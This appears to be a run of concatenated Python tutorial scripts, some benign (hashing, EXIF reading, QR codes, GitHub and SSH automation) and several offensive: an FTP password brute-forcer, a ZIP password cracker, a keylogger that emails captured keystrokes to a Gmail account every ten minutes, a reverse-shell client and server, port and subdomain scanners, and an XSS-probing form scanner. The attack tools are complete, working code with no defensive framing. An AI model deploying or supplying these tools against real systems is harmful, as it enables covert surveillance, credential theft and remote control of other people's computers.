passwords = open(passlist).read().split("\n")
print("[+] Passwords to try:", len(passwords))
# put all passwords to the queue
for password in passwords:
q.put(password)
# create n_threads that runs that function
for t in range(n_threads):
thread = Thread(target=connect_ftp)
# will end when the main thread end
thread.daemon = True
thread.start()
# wait for the queue to be empty
q.join()
import ftplib
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
init()
# hostname or IP address of the FTP server
host = "192.168.1.113"
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21
def is_correct(password):
# initialize the FTP server object
server = ftplib.FTP()
print(f"[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
return False
else:
# correct credentials
print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
return True
# read the wordlist of passwords
passwords = open("wordlist.txt").read().split("\n")
print("[+] Passwords to try:", len(passwords))
# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwords:
if is_correct(password):
break
import hashlib
import sys
def read_file(file):
"""Reads en entire file and returns file bytes."""
BUFFER_SIZE = 16384 # 16 kilo bytes
b = b""
with open(file, "rb") as f:
while True:
# read 16K bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if bytes_read:
# if there is bytes, append them
b += bytes_read
else:
# if not, nothing to do here, break out of the loop
break
return b
if __name__ == "__main__":
# read some file
file_content = read_file(sys.argv[1])
# some chksums:
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(file_content).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(file_content).hexdigest())
print("SHA-512:", hashlib.sha512(file_content).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(file_content).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(file_content).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(file_content).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(file_content).hexdigest())
import hashlib
# encode it to bytes using UTF-8 encoding
message = "Some text to hash".encode()
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(message).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(message).hexdigest())
print("SHA-512:", hashlib.sha512(message).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(message).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(message).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(message).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(message).hexdigest())
from PIL import Image
from PIL.ExifTags import TAGS
import sys
# path to the image or video
imagename = sys.argv[1]
# read the image data using PIL
image = Image.open(imagename)
# extract EXIF data
exifdata = image.getexif()
# iterating over all EXIF data fields
for tag_id in exifdata:
# get the tag name, instead of human unreadable tag id
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
print(f"{tag:25}: {data}")
import keyboard # for keylogs
import smtplib # for sending email using SMTP protocol (gmail)
# Semaphore is for blocking the current thread
# Timer is to make a method runs after an interval amount of time
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 600 # 10 minutes
EMAIL_ADDRESS = "put_real_address_heregmail.com"
EMAIL_PASSWORD = "put_real_pw"
class Keylogger:
def __init__(self, interval):
# we gonna pass SEND_REPORT_EVERY to interval
self.interval = interval
# this is the string variable that contains the log of all
# the keystrokes within self.interval
self.log = ""
# for blocking after setting the on_release listener
self.semaphore = Semaphore(0)
def callback(self, event):
"""
This callback is invoked whenever a keyboard event is occured
(i.e when a key is released in this example)
"""
name = event.name
if len(name) > 1:
# not a character, special key (e.g ctrl, alt, etc.)
# uppercase with []
if name == "space":
# " " instead of "space"
name = " "
elif name == "enter":
# add a new line whenever an ENTER is pressed
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
# replace spaces with underscores
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log += name
def sendmail(self, email, password, message):
# manages a connection to an SMTP server
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
# connect to the SMTP server as TLS mode ( for security )
server.starttls()
# login to the email account
server.login(email, password)
# send the actual message
server.sendmail(email, email, message)
# terminates the session
server.quit()
def report(self):
"""
This function gets called every self.interval
It basically sends keylogs and resets self.log variable
"""
if self.log:
# if there is something in log, report it
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
# can print to a file, whatever you want
# print(self.log)
self.log = ""
Timer(interval=self.interval, function=self.report).start()
def start(self):
# start the keylogger
keyboard.on_release(callback=self.callback)
# start reporting the keylogs
self.report()
# block the current thread,
# since on_release() doesn't block the current thread
# if we don't block it, when we execute the program, nothing will happen
# that is because on_release() will start the listener in a separate thread
self.semaphore.acquire()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
keylogger.start()
import argparse
import socket # for connecting
from colorama import init, Fore
from threading import Thread, Lock
from queue import Queue
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
# number of threads, feel free to tune this parameter as you wish
N_THREADS = 200
# thread queue
q = Queue()
print_lock = Lock()
def port_scan(port):
"""
Scan a port on the global variable host
"""
try:
s = socket.socket()
s.connect((host, port))
except:
with print_lock:
print(f"{GRAY}{host:15}:{port:5} is closed {RESET}", end='\r')
else:
with print_lock:
print(f"{GREEN}{host:15}:{port:5} is open {RESET}")
finally:
s.close()
def scan_thread():
global q
while True:
# get the port number from the queue
worker = q.get()
# scan that port number
port_scan(worker)
# tells the queue that the scanning for that port
# is done
q.task_done()
def main(host, ports):
global q
for t in range(N_THREADS):
# for each thread, start it
t = Thread(target=scan_thread)
# when we set daemon to true, that thread will end when the main thread ends
t.daemon = True
# start the daemon thread
t.start()
for worker in ports:
# for each port, put that port into the queue
# to start scanning
q.put(worker)
# wait the threads ( port scanners ) to finish
q.join()
if __name__ == "__main__":
# parse some parameters passed
parser = argparse.ArgumentParser(description="Simple port scanner")
parser.add_argument("host", help="Host to scan.")
parser.add_argument("--ports", "-p", dest="port_range", default="1-65535", help="Port range to scan, default is 1-65535 (all ports)")
args = parser.parse_args()
host, port_range = args.host, args.port_range
start_port, end_port = port_range.split("-")
start_port, end_port = int(start_port), int(end_port)
ports = [ p for p in range(start_port, end_port)]
main(host, ports)
import socket # for connecting
from colorama import init, Fore
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
def is_port_open(host, port):
"""
determine whether host has the port open
"""
# creates a new socket
s = socket.socket()
try:
# tries to connect to host using that port
s.connect((host, port))
# make timeout if you want it a little faster ( less accuracy )
s.settimeout(0.2)
except:
# cannot connect, port is closed
# return false
return False
else:
# the connection was established, port is open!
return True
# get the host from the user
host = input("Enter the host:")
# iterate over ports, from 1 to 1024
for port in range(1, 1025):
if is_port_open(host, port):
print(f"{GREEN}[+] {host}:{port} is open {RESET}")
else:
print(f"{GRAY}[!] {host}:{port} is closed {RESET}", end="\r")
import socket
import subprocess
import sys
SERVER_HOST = sys.argv[1]
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create the socket object
s = socket.socket()
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))
# receive the greeting message
message = s.recv(BUFFER_SIZE).decode()
print("Server:", message)
while True:
# receive the command from the server
command = s.recv(BUFFER_SIZE).decode()
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# execute the command and retrieve the results
output = subprocess.getoutput(command)
# send the results back to the server
s.send(output.encode())
# close client connection
s.close()
import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create a socket object
s = socket.socket()
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
# make the PORT reusable
# when you run the server multiple times in Linux, Address already in use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
# just sending a message, for demonstration purposes
message = "Hello and Welcome".encode()
client_socket.send(message)
while True:
# get the command from prompt
command = input("Enter the command you wanna execute:")
# send the command to the client
client_socket.send(command.encode())
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# retrieve command results
results = client_socket.recv(BUFFER_SIZE).decode()
# print them
print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
import cv2
import numpy as np
import os
def to_bin(data):
"""Convert data to binary format as string"""
if isinstance(data, str):
return ''.join([ format(ord(i), "08b") for i in data ])
elif isinstance(data, bytes) or isinstance(data, np.ndarray):
return [ format(i, "08b") for i in data ]
elif isinstance(data, int) or isinstance(data, np.uint8):
return format(data, "08b")
else:
raise TypeError("Type not supported.")
def encode(image_name, secret_data):
# read the image
image = cv2.imread(image_name)
# maximum bytes to encode
n_bytes = image.shape[0] * image.shape[1] * 3 // 8
print("[*] Maximum bytes to encode:", n_bytes)
if len(secret_data) > n_bytes:
raise ValueError("[!] Insufficient bytes, need bigger image or less data.")
print("[*] Encoding data...")
# add stopping criteria
secret_data += "====="
data_index = 0
# convert data to binary
binary_secret_data = to_bin(secret_data)
# size of data to hide
data_len = len(binary_secret_data)
for row in image:
for pixel in row:
# convert RGB values to binary format
r, g, b = to_bin(pixel)
# modify the least significant bit only if there is still data to store
if data_index < data_len:
# least significant red pixel bit
pixel[0] = int(r[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant green pixel bit
pixel[1] = int(g[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant blue pixel bit
pixel[2] = int(b[:-1] + binary_secret_data[data_index], 2)
data_index += 1
# if data is encoded, just break out of the loop
if data_index >= data_len:
break
return image
def decode(image_name):
print("[+] Decoding...")
# read the image
image = cv2.imread(image_name)
binary_data = ""
for row in image:
for pixel in row:
r, g, b = to_bin(pixel)
binary_data += r[-1]
binary_data += g[-1]
binary_data += b[-1]
# split by 8-bits
all_bytes = [ binary_data[i: i+8] for i in range(0, len(binary_data), 8) ]
# convert from bits to characters
decoded_data = ""
for byte in all_bytes:
decoded_data += chr(int(byte, 2))
if decoded_data[-5:] == "=====":
break
return decoded_data[:-5]
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Steganography encoder/decoder, this Python scripts encode data within images.")
parser.add_argument("-t", "--text", help="The text data to encode into the image, this only should be specified for encoding")
parser.add_argument("-e", "--encode", help="Encode the following image")
parser.add_argument("-d", "--decode", help="Decode the following image")
args = parser.parse_args()
secret_data = args.text
if args.encode:
# if the encode argument is specified
input_image = args.encode
print("input_image:", input_image)
# split the absolute path and the file
path, file = os.path.split(input_image)
# split the filename and the image extension
filename, ext = file.split(".")
output_image = os.path.join(path, f"{filename}_encoded.{ext}")
# encode the data into the image
encoded_image = encode(image_name=input_image, secret_data=secret_data)
# save the output image (encoded image)
cv2.imwrite(output_image, encoded_image)
print("[+] Saved encoded image.")
if args.decode:
input_image = args.decode
# decode the secret data from the image
decoded_data = decode(input_image)
print("[+] Decoded data:", decoded_data)
import requests
from threading import Thread
from queue import Queue
q = Queue()
def scan_subdomains(domain):
global q
while True:
# get the subdomain from the queue
subdomain = q.get()
# scan the subdomain
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print("[+] Discovered subdomain:", url)
# we're done with scanning that subdomain
q.task_done()
def main(domain, n_threads, subdomains):
global q
# fill the queue with all the subdomains
for subdomain in subdomains:
q.put(subdomain)
for t in range(n_threads):
# start all threads
worker = Thread(target=scan_subdomains, args=(domain,))
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads")
parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')")
parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt",
default="subdomains.txt")
parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. Default is 10", default=10, type=int)
args = parser.parse_args()
domain = args.domain
wordlist = args.wordlist
num_threads = args.num_threads
main(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines())
q.join()
import requests
# the domain to scan for subdomains
domain = "google.com"
# read all subdomains
file = open("subdomains.txt")
# read all content
content = file.read()
# split by new lines
subdomains = content.splitlines()
for subdomain in subdomains:
# construct the url
url = f"http://{subdomain}.{domain}"
try:
# if this raises an ERROR, that means the subdomain does not exist
requests.get(url)
except requests.ConnectionError:
# if the subdomain does not exist, just pass, print nothing
pass
else:
print("[+] Discovered subdomain:", url)
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
def get_all_forms(url):
"""Given a url, it returns all forms from the HTML content"""
soup = bs(requests.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""
This function extracts all possible useful information about an HTML form
"""
details = {}
# get the form action (target url)
action = form.attrs.get("action").lower()
# get the form method (POST, GET, etc.)
method = form.attrs.get("method", "get").lower()
# get all the input details such as type and name
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def submit_form(form_details, url, value):
"""
Submits a form given in form_details
Params:
form_details (list): a dictionary that contain form information
url (str): the original URL that contain that form
value (str): this will be replaced to all text and search inputs
Returns the HTTP Response after form submission
"""
# construct the full URL (if the url provided in action is relative)
target_url = urljoin(url, form_details["action"])
# get the inputs
inputs = form_details["inputs"]
data = {}
for input in inputs:
# replace all text and search values with value
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
# if input name and value are not None,
# then add them to the data of form submission
data[input_name] = input_value
if form_details["method"] == "post":
return requests.post(target_url, data=data)
else:
# GET request
return requests.get(target_url, params=data)
def scan_xss(url):
"""
Given a url, it prints all XSS vulnerable forms and
returns True if any is vulnerable, False otherwise
"""
# get all the forms from the URL
forms = get_all_forms(url)
print(f"[+] Detected {len(forms)} forms on {url}.")
js_script = "<Script>alert('hi')</scripT>"
# returning value
is_vulnerable = False
# iterate over all forms
for form in forms:
form_details = get_form_details(form)
content = submit_form(form_details, url, js_script).content.decode()
if js_script in content:
print(f"[+] XSS Detected on {url}")
print(f"[*] Form details:")
pprint(form_details)
is_vulnerable = True
# won't break because we want to print other available vulnerable forms
return is_vulnerable
if __name__ == "__main__":
import sys
url = sys.argv[1]
print(scan_xss(url))
from tqdm import tqdm
import zipfile
import sys
# the password list path you want to use
wordlist = sys.argv[2]
# the zip file you want to crack its password
zip_file = sys.argv[1]
# initialize the Zip File object
zip_file = zipfile.ZipFile(zip_file)
# count the number of words in this wordlist
n_words = len(list(open(wordlist, "rb")))
# print the total number of passwords
print("Total passwords to test:", n_words)
with open(wordlist, "rb") as wordlist:
for word in tqdm(wordlist, total=n_words, unit="word"):
try:
zip_file.extractall(pwd=word.strip())
except:
continue
else:
print("[+] Password found:", word.decode().strip())
exit(0)
print("[!] Password not found, try other wordlist.")
import requests
from pprint import pprint
# email and password
auth = ("emailexample.com", "ffffffff")
# get the HTTP Response
res = requests.get("https://secure.veesp.com/api/details", auth=auth)
# get the account details
account_details = res.json()
pprint(account_details)
# get the bought services
services = requests.get('https://secure.veesp.com/api/service', auth=auth).json()
pprint(services)
# get the upgrade options
upgrade_options = requests.get('https://secure.veesp.com/api/service/32723/upgrade', auth=auth).json()
pprint(upgrade_options)
# list all bought VMs
all_vms = requests.get("https://secure.veesp.com/api/service/32723/vms", auth=auth).json()
pprint(all_vms)
# stop a VM automatically
stopped = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/stop", auth=auth).json()
print(stopped)
# {'status': True}
# start it again
started = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/start", auth=auth).json()
print(started)
# {'status': True}
import os
import matplotlib.pyplot as plt
def get_size_format(b, factor=1024, suffix="B"):
"""
Scale bytes to its proper byte format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
def get_directory_size(directory):
"""Returns the directory size in bytes."""
total = 0
try:
# print("[+] Getting the size of", directory)
for entry in os.scandir(directory):
if entry.is_file():
# if it's a file, use stat() function
total += entry.stat().st_size
elif entry.is_dir():
# if it's a directory, recursively call this function
total += get_directory_size(entry.path)
except NotADirectoryError:
# if directory isn't a directory, get the file size then
return os.path.getsize(directory)
except PermissionError:
# if for whatever reason we can't open the folder, return 0
return 0
return total
def plot_pie(sizes, names):
"""Plots a pie where sizes is the wedge sizes and names """
plt.pie(sizes, labels=names, autopct=lambda pct: f"{pct:.2f}%")
plt.title("Different Sub-directory sizes in bytes")
plt.show()
if __name__ == "__main__":
import sys
folder_path = sys.argv[1]
directory_sizes = []
names = []
# iterate over all the directories inside this path
for directory in os.listdir(folder_path):
directory = os.path.join(folder_path, directory)
# get the size of this directory (folder)
directory_size = get_directory_size(directory)
if directory_size == 0:
continue
directory_sizes.append(directory_size)
names.append(os.path.basename(directory) + ": " + get_size_format(directory_size))
print("[+] Total directory size:", get_size_format(sum(directory_sizes)))
plot_pie(directory_sizes, names)
import tarfile
from tqdm import tqdm # pip3 install tqdm
def decompress(tar_file, path, members=None):
"""
Extracts tar_file and puts the members to path.
If members is None, all members on tar_file will be extracted.
"""
tar = tarfile.open(tar_file, mode="r:gz")
if members is None:
members = tar.getmembers()
# with progress bar
# set the progress bar
progress = tqdm(members)
for member in progress:
tar.extract(member, path=path)
# set the progress description of the progress bar
progress.set_description(f"Extracting {member.name}")
# or use this
# tar.extractall(members=members, path=path)
# close the file
tar.close()
def compress(tar_file, members):
"""
Adds files (members) to a tar_file and compress it
"""
# open file for gzip compressed writing
tar = tarfile.open(tar_file, mode="w:gz")
# with progress bar
# set the progress bar
progress = tqdm(members)
for member in progress:
# add file/folder/link to the tar file (compress)
tar.add(member)
# set the progress description of the progress bar
progress.set_description(f"Compressing {member}")
# close the file
tar.close()
# compress("compressed.tar.gz", ["test.txt", "test_folder"])
# decompress("compressed.tar.gz", "extracted")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="TAR file compression/decompression using GZIP.")
parser.add_argument("method", help="What to do, either 'compress' or 'decompress'")
parser.add_argument("-t", "--tarfile", help="TAR file to compress/decompress, if it isn't specified for compression, the new TAR file will be named after the first file to compress.")
parser.add_argument("-p", "--path", help="The folder to compress into, this is only for decompression. Default is '.' (the current directory)", default="")
parser.add_argument("-f", "--files", help="File(s),Folder(s),Link(s) to compress/decompress separated by ','.")
args = parser.parse_args()
method = args.method
tar_file = args.tarfile
path = args.path
files = args.files
# split by ',' to convert into a list
files = files.split(",") if isinstance(files, str) else None
if method.lower() == "compress":
if not files:
print("Files to compress not provided, exiting...")
exit(1)
elif not tar_file:
# take the name of the first file
tar_file = f"{files[0]}.tar.gz"
compress(tar_file, files)
elif method.lower() == "decompress":
if not tar_file:
print("TAR file to decompress is not provided, nothing to do, exiting...")
exit(2)
decompress(tar_file, path, files)
else:
print("Method not known, please use 'compress/decompress'.")
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.audio import MIME
# your credentials
email = "emailexample.com"
password = "password"
# the sender's email
FROM = "emailexample.com"
# the receiver's email
TO = "toexample.com"
# the subject of the email (subject)
subject = "Just a subject"
# initialize the message we wanna send
msg = MIMEMultipart()
# set the sender's email
msg["From"] = FROM
# set the receiver's email
msg["To"] = TO
# set the subject
msg["Subject"] = subject
# set the body of the email
text = MIMEText("This email is sent using <b>Python</b> !", "html")
# attach this body to the email
msg.attach(text)
# initialize the SMTP server
server = smtplib.SMTP("smtp.gmail.com", 587)
# connect to the SMTP server as TLS mode (secure) and send EHLO
server.starttls()
# login to the account using the credentials
server.login(email, password)
# send the email
server.sendmail(FROM, TO, msg.as_string())
# terminate the SMTP session
server.quit()
import paramiko
import argparse
parser = argparse.ArgumentParser(description="Python script to execute BASH scripts on Linux boxes remotely.")
parser.add_argument("host", help="IP or domain of SSH Server")
parser.add_argument("-u", "--user", required=True, help="The username you want to access to.")
parser.add_argument("-p", "--password", required=True, help="The password of that user")
parser.add_argument("-b", "--bash", required=True, help="The BASH script you wanna execute")
args = parser.parse_args()
hostname = args.host
username = args.user
password = args.password
bash_script = args.bash
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password)
except:
print("[!] Cannot connect to the SSH Server")
exit()
# read the BASH script content from the file
bash_script = open(bash_script).read()
# execute the BASH script
stdin, stdout, stderr = client.exec_command(bash_script)
# read the standard output and print it
print(stdout.read().decode())
# print errors if there are any
err = stderr.read().decode()
if err:
print(err)
# close the connection
client.close()
import paramiko
hostname = "192.168.1.101"
username = "test"
password = "abc123"
commands = [
"pwd",
"id",
"uname -a",
"df -h"
]
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password)
except:
print("[!] Cannot connect to the SSH Server")
exit()
# execute the commands
for command in commands:
print("="*50, command, "="*50)
stdin, stdout, stderr = client.exec_command(command)
print(stdout.read().decode())
err = stderr.read().decode()
if err:
print(err)
client.close()
from tqdm import tqdm
import requests
import sys
# the url of file you want to download, passed from command line arguments
url = sys.argv[1]
# read 1024 bytes every time
buffer_size = 1024
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = url.split("/")[-1]
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(buffer_size), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
import qrcode
import sys
data = sys.argv[1]
filename = sys.argv[2]
# generate qr code
img = qrcode.make(data)
# save img to a file
img.save(filename)
import cv2
import sys
filename = sys.argv[1]
# read the QRCODE image
img = cv2.imread(filename)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
# detect and decode
data, bbox, straight_qrcode = detector.detectAndDecode(img)
# if there is a QR code
if bbox is not None:
print(f"QRCode data:\n{data}")
# display the image with lines
# length of bounding box
n_lines = len(bbox)
for i in range(n_lines):
# draw all lines
point1 = tuple(bbox[i][0])
point2 = tuple(bbox[(i+1) % n_lines][0])
cv2.line(img, point1, point2, color=(255, 0, 0), thickness=2)
# display the result
cv2.imshow("img", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
import cv2
# initalize the cam
cap = cv2.VideoCapture(0)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
while True:
_, img = cap.read()
# detect and decode
data, bbox, _ = detector.detectAndDecode(img)
# check if there is a QRCode in the image
if bbox is not None:
# display the image with lines
for i in range(len(bbox)):
# draw all lines
cv2.line(img, tuple(bbox[i][0]), tuple(bbox[(i+1) % len(bbox)][0]), color=(255, 0, 0), thickness=2)
if data:
print("[+] QR Code detected, data:", data)
# display the result
cv2.imshow("img", img)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
from github import Github
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# searching for my repository
repo = g.search_repositories("pythoncode tutorials")[0]
# create a file and commit n push
repo.create_file("test.txt", "commit message", "content of the file")
# delete that created file
contents = repo.get_contents("test.txt")
repo.delete_file(contents.path, "remove test.txt", contents.sha)
import requests
from pprint import pprint
# github username
username = "x4nth055"
# url to request
url = f"https://api.github.com/users/{username}"
# make the request and return the json
user_data = requests.get(url).json()
# pretty print JSON data
pprint(user_data)
# get name
name = user_data["name"]
# get blog url if there is
blog = user_data["blog"]
# extract location
location = user_data["location"]
# get email address that is publicly available
email = user_data["email"]
# number of public repositories
public_repos = user_data["public_repos"]
# get number of public gists
public_gists = user_data["public_gists"]
# number of followers
followers = user_data["followers"]
# number of following
following = user_data["following"]
# date of account creation
date_created = user_data["created_at"]
# date of account last update
date_updated = user_data["updated_at"]
# urls
followers_url = user_data["followers_url"]
following_url = user_data["following_url"]
# print all
print("User:", username)
print("Name:", name)
print("Blog:", blog)
print("Location:", location)
print("Email:", email)
print("Total Public repositories:", public_repos)
print("Total Public Gists:", public_gists)
print("Total followers:", followers)
print("Total following:", following)
print("Date Created:", date_created)
print("Date Updated:", date_updated)
import base64
from github import Github
import sys
def print_repo(repo):
# repository full name
print("Full name:", repo.full_name)
# repository description
print("Description:", repo.description)
# the date of when the repo was created
print("Date created:", repo.created_at)
# the date of the last git push
print("Date of last push:", repo.pushed_at)
# home website (if available)
print("Home Page:", repo.homepage)
# programming language
print("Language:", repo.language)
# number of forks
print("Number of forks:", repo.forks)
# number of stars
print("Number of stars:", repo.stargazers_count)
print("-"*50)
# repository content (files & directories)
print("Contents:")
for content in repo.get_contents(""):
print(content)
try:
# repo license
print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
except:
pass
# Github username from the command line
username = sys.argv[1]
# pygithub object
g = Github()
# get that user by username
user = g.get_user(username)
# iterate over all public repositories
for repo in user.get_repos():
print_repo(repo)
print("="*100)
from github import Github
import base64
def print_repo(repo):
# repository full name
print("Full name:", repo.full_name)
# repository description
print("Description:", repo.description)
# the date of when the repo was created
print("Date created:", repo.created_at)
# the date of the last git push
print("Date of last push:", repo.pushed_at)
# home website (if available)
print("Home Page:", repo.homepage)
# programming language
print("Language:", repo.language)
# number of forks
print("Number of forks:", repo.forks)
# number of stars
print("Number of stars:", repo.stargazers_count)
print("-"*50)
# repository content (files & directories)
print("Contents:")
for content in repo.get_contents(""):
print(content)
try:
# repo license
print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
except:
pass
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# or use public version
# g = Github()
# search repositories by name
for repo in g.search_repositories("pythoncode tutorials"):
# print repository details
print_repo(repo)
print("="*100)
print("="*100)
print("="*100)
# search by programming language
for i, repo in enumerate(g.search_repositories("language:python")):
print_repo(repo)
print("="*100)
if i == 9:
break
import ipaddress
# initialize an IPv4 Address
ip = ipaddress.IPv4Address("192.168.1.1")
# print True if the IP address is global
print("Is global:", ip.is_global)
# print Ture if the IP address is Link-local
print("Is link-local:", ip.is_link_local)
# ip.is_reserved
# ip.is_multicast
# next ip address
print(ip + 1)
# previous ip address
print(ip - 1)
# initialize an IPv4 Network
network = ipaddress.IPv4Network("192.168.1.0/24")
# get the network mask
print("Network mask:", network.netmask)
# get the broadcast address
print("Broadcast address:", network.broadcast_address)
# print the number of IP addresses under this network
print("Number of hosts under", str(network), ":", network.num_addresses)
# iterate over all the hosts under this network
print("Hosts under", str(network), ":")
for host in network.hosts():
print(host)
# iterate over the subnets of this network
print("Subnets:")
for subnet in network.subnets(prefixlen_diff=2):
print(subnet)
# get the supernet of this network
print("Supernet:", network.supernet(prefixlen_diff=1))
# prefixlen_diff: An integer, the amount the prefix length of
# the network should be decreased by. For example, given a
# /24 network and a prefixlen_diff of 3, a supernet with a
# /21 netmask is returned.
# tell if this network is under (or overlaps) 192.168.0.0/16
print("Overlaps 192.168.0.0/16:", network.overlaps(ipaddress.IPv4Network("192.168.0.0/16")))
import keyboard
# registering a hotkey that replaces one typed text with another
# replaces every "email" followed by a space with my actual email
keyboard.add_abbreviation("email", "rockikzthepythoncode.com")
# invokes a callback everytime a hotkey is pressed
keyboard.add_hotkey("ctrl+alt+p", lambda: print("CTRL+ALT+P Pressed!"))
# check if a ctrl is pressed
print(keyboard.is_pressed('ctrl'))
# press space
keyboard.send("space")
# sends artificial keyboard events to the OS
# simulating the typing of a given text
# setting 0.1 seconds to wait between keypresses to look fancy
keyboard.write("Python Programming is always fun!", delay=0.1)
# record all keyboard clicks until esc is clicked
events = keyboard.record('esc')
# play these events
keyboard.play(events)
# remove all keyboard hooks in use
keyboard.unhook_all()
from fbchat import Client
from fbchat.models import Message, MessageReaction
# facebook user credentials
username = "username.or.email"
password = "password"
# login
client = Client(username, password)
# get 20 users you most recently talked to
users = client.fetchThreadList()
print(users)
# get the detailed informations about these users
detailed_users = [ list(client.fetchThreadInfo(user.uid).values())[0] for user in users ]
# sort by number of messages
sorted_detailed_users = sorted(detailed_users, key=lambda u: u.message_count, reverse=True)
# print the best friend!
best_friend = sorted_detailed_users[0]
print("Best friend:", best_friend.name, "with a message count of", best_friend.message_count)
# message the best friend!
client.send(Message(
text=f"Congratulations {best_friend.name}, you are my best friend with {best_friend.message_count} messages!"
),
thread_id=best_friend.uid)
# get all users you talked to in messenger in your account
all_users = client.fetchAllUsers()
print("You talked with a total of", len(all_users), "users!")
# let's logout
client.logout()
import mouse
# left click
mouse.click('left')
# right click
mouse.click('right')
# middle click
mouse.click('middle')
# get the position of mouse
print(mouse.get_position())
# In [12]: mouse.get_position()
# Out[12]: (714, 488)
# presses but doesn't release
mouse.hold('left')
# mouse.press('left')
# drag from (0, 0) to (100, 100) relatively with a duration of 0.1s
